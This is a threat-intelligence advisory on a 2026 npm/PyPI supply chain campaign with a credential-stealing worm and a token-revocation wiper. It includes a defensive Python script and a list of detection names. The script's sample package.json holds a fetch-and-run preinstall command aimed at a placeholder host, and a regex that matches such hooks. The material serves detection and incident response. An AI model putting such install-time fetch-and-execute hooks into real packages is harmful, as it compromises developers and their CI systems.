TeamPCP Strikes Again: TanStack, UiPath & npm Supply Chain Compromise with Wiper Daemon
Wiz documented a coordinated supply chain attack launched by TeamPCP (Mini Shai-Hulud) on May 11, 2026, compromising 89 npm packages and two PyPI packages spanning developer tooling, enterprise automation, and AI namespaces. The npm package @tanstack/react-router alone accounts for approximately 12 million weekly downloads. The campaign builds on the preinstall-hook/Bun execution chain used in prior TeamPCP waves and adds a novel GitHub Actions vector that extracts OIDC tokens directly from runner process memory, bypassing environment-variable secret masking entirely.
The payload steals credentials from developer machines and CI/CD pipelines, including, for the first time, password vault data, and self-propagates by publishing poisoned versions of the victim's own npm packages. A novel persistence daemon wipes the user's home directory if the stolen GitHub token is revoked, so teams should remove the daemon before rotating credentials. The Python variant adds geographic targeting: on systems whose timezone or language settings indicate Israel or Iran, it rolls a random value between 1 and 6 and, if it lands on 2, plays an MP3 file at full volume and attempts to delete all files in the home directory. Exfiltration uses three redundant channels, including the decentralized Session Messenger network, which was not seen in prior TeamPCP campaigns.
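As an added defender-side example (not code from the Wiz report or from any project named above), the script below covers the two actions the summary calls out: confirm the gh-token-monitor persistence unit is gone before a GitHub token is rotated, and flag install-time npm lifecycle hooks that fetch or invoke Bun. The two unit paths are the ones listed in the report's IOCs; the sample package.json, the regex and the example.invalid URL are constructed for illustration.

```python
"""Pre-rotation check for the TeamPCP token-revocation wiper (added example)."""
import json
import os
import re

# Persistence unit paths reported for the gh-token-monitor daemon (from the advisory IOCs).
WIPER_PERSISTENCE_PATHS = [
    "~/Library/LaunchAgents/com.user.gh-token-monitor.plist",  # macOS LaunchAgent
    "~/.config/systemd/user/gh-token-monitor.service",          # Linux systemd user unit
]

# npm lifecycle hooks that run at install time, the stage this campaign abuses.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Constructed heuristic: a download utility fetching a Bun binary, or bun/bunx running a script.
BUN_FETCH_RE = re.compile(r"\b(curl|wget)\b.*\bbun\b|\bbunx?\b\s+\S+\.(mjs|js)\b", re.I)


def find_wiper_persistence(paths=WIPER_PERSISTENCE_PATHS, exists=os.path.exists):
    """Return the expanded persistence paths present on this host.
    `exists` is injectable so the check can be exercised offline."""
    return [p for p in (os.path.expanduser(x) for x in paths) if exists(p)]


def suspicious_lifecycle_scripts(package_json_text):
    """Return {hook: command} for install-time hooks matching the Bun fetch/exec heuristic."""
    scripts = json.loads(package_json_text).get("scripts") or {}
    return {h: c for h, c in scripts.items()
            if h in INSTALL_HOOKS and isinstance(c, str) and BUN_FETCH_RE.search(c)}


def safe_to_rotate(package_json_text, exists=os.path.exists):
    """Rotation is safe only once no wiper persistence unit remains; hooks are reported for triage."""
    persistence = find_wiper_persistence(exists=exists)
    hooks = suspicious_lifecycle_scripts(package_json_text)
    return {"persistence": persistence, "hooks": hooks, "safe_to_rotate": not persistence}


# Constructed sample package.json, not taken from any real compromised package.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-pkg",
    "scripts": {
        "preinstall": "curl -fsSL https://example.invalid/bun -o /tmp/bun && /tmp/bun setup.mjs",
        "test": "vitest",
    },
})

if __name__ == "__main__":
    print(json.dumps(safe_to_rotate(SAMPLE_PACKAGE_JSON), indent=2))
```

Run it on the workstation or runner before revoking the token; a non-empty `persistence` list means the daemon is still installed and rotation should wait until it is removed.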
IOCs (20)
Detections (10)
- npm Node Lifecycle Hook Spawning Download Utility to Fetch Bun Runtime
- npm Lifecycle Script Executing Malicious Payload via Bun Runtime
- IDE or AI Coding Assistant Persistence Backdoor Execution
- Token Revocation Home Directory Wipe
- GitHub Actions Cache Poisoning via pull_request_target with OIDC Token Extraction from Runner Memory
- GitHub Repository Created with Campaign-Specific Description Marker
- Session Messenger (getsession.org) C2 Exfiltration — Outbound Connections from Developer Tooling
- Self-Propagating Worm — npm Package Published via Stolen Registry Token
- Python Payload Download from Typosquat Domain via pip or Direct HTTP Fetch